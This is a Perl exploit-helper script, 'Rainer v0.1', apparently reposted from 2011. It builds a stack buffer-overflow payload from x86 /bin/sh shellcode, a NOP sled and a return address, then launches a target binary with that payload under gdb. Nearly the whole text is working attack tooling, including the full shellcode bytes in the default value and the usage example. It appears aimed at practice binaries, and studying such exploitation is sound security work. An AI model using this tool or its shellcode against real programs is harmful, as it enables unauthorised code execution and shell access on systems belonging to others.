Rainer v0.1 by localh0t
来源:mattdch0@gmail.com 作者:localh0t 发布时间:2011-08-30
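#!/usr/local/bin/perl
# Author: localh0t
# Date: 18/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
#
# Rainer assembles one gdb command line that starts a local target binary
# with a single argument made of shellcode, a NOP run and a return address,
# then replaces this process with that command.
#
# The command string is handed to the shell by exec(), so every value taken
# from @ARGV is validated or quoted before it is interpolated into it.

use strict;
use warnings;

# Help
# Count the arguments instead of testing the truth of $ARGV[2], so that a
# literal "0" in third position does not trigger the help screen.
if (@ARGV < 3) {
    print "\n\n###########################";
    print "\n# Rainer v0.1 by localh0t #";
    print "\n###########################";
    print "\n\nUse: perl $0 -t [BINARY TARGET] -s [SHELLCODE (Optional)] -n [NOP's AMOUNT] -r [RETURN ADRESS] -m [RETURN METHOD (Optional)]\n";
    print "Example: perl $0 -t ExploitMe -s \"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" -n 60 -r \"\\xb8\\xf3\\xff\\xbf\" -m Normal\n";
    print "\nNote #1: If shellcode not defined, default to: 24 bytes /bin/sh shellcode.\n";
    print "Note #2: If method not defined, normal method will be used.\n\n";
    print "Methods:\n========\n";
    print "Normal : shellcode + nops + ret + null\n";
    print "NOPsled: nops + shellcode + ret + null\n\n";
    exit(0);
}

# Default shellcode, 24 bytes /bin/sh
my $default = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

# The only shape accepted for -s and -r: one or more \xHH escapes, as in the
# usage example. Anything else could break out of the printf "..." string
# that the shell evaluates.
my $HEX_ESCAPES = qr/\A(?:\\x[0-9A-Fa-f]{2})+\z/;

# Functions

# Wrap a value in single quotes for /bin/sh, escaping embedded single quotes.
sub _shell_quote {
    my ($text) = @_;
    $text =~ s/'/'\\''/g;
    return "'$text'";
}

# Build the gdb command line for a target and an already-ordered buffer.
# The four trailing \x00 escapes are emitted by the shell's printf.
sub _gdb_command {
    my ($bin, $buffer) = @_;
    return 'gdb --eval-command="run" --args ' . _shell_quote($bin)
         . ' $(printf "' . $buffer . '\x00\x00\x00\x00")';
}

# Normal layout: shellcode + nops + ret + null.
# Arguments: target binary, shellcode, NOP run, return address.
# Returns the shell command string.
sub normal {
    my ($bin, $shell, $nops, $ret) = @_;
    return _gdb_command($bin, $shell . $nops . $ret);
}

# NOPsled layout: nops + shellcode + ret + null.
# Arguments: target binary, NOP run, shellcode, return address.
# Returns the shell command string.
sub nopsled {
    my ($bin, $nops, $shell, $ret) = @_;
    return _gdb_command($bin, $nops . $shell . $ret);
}

# Giving values to variables
# Walk @ARGV by index: each recognised flag takes the element that follows
# it. A flag given twice keeps its last value.
my %is_option = map { $_ => 1 } qw(-t -s -n -r -m);
my %value_for;
for my $i (0 .. $#ARGV) {
    my $flag = $ARGV[$i];
    next unless $is_option{$flag};
    $value_for{$flag} = $ARGV[ $i + 1 ];
}

# undef (not -1) marks "not supplied", and is tested with defined(); an
# assignment inside the condition would always be true and discard -s.
my $bin   = $value_for{'-t'};
my $shell = $value_for{'-s'};
my $na    = defined $value_for{'-n'} ? $value_for{'-n'} : 0;
my $ret   = defined $value_for{'-r'} ? $value_for{'-r'} : '';
my $meth  = $value_for{'-m'};

die "Missing target binary (-t)\n"
    unless defined $bin && length $bin;
die "NOP amount (-n) must be a non-negative integer\n"
    unless $na =~ /\A[0-9]+\z/;
die "Return address (-r) must be written as \\xHH escapes\n"
    if length $ret && $ret !~ $HEX_ESCAPES;

# If shellcode not present, default used
if (defined $shell) {
    die "Shellcode (-s) must be written as \\xHH escapes\n"
        unless $shell =~ $HEX_ESCAPES;
}
else {
    $shell = $default;
}

# NOPs payload
my $nops = "\x90" x $na;

# Main
# Any method other than NOPsled (including none) uses the normal layout.
my $payload = ( defined $meth && $meth eq 'NOPsled' )
    ? nopsled( $bin, $nops, $shell, $ret )
    : normal( $bin, $shell, $nops, $ret );

# exec only returns on failure; report it instead of ending silently.
exec($payload) or die "Could not run gdb: $!\n";
__END__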